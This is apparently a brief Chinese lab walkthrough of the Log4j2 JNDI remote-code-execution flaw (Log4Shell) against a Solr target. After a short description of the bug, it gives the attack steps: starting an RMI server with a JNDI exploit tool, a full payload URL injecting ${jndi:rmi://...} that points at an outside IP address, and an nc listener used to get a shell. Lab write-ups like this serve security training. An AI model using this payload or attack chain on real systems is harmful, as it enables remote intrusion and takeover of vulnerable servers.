漏洞简介
Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。
开启靶场
JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务
在 url 中插⼊构造的 payload
http://192.168.121.129:8983/solr/admin/cores? action=${jndi:rmi://116.62.17.187:1099/qdz3ly}
开启 nc 监听,成功 getshell
其实很简单,大家加油。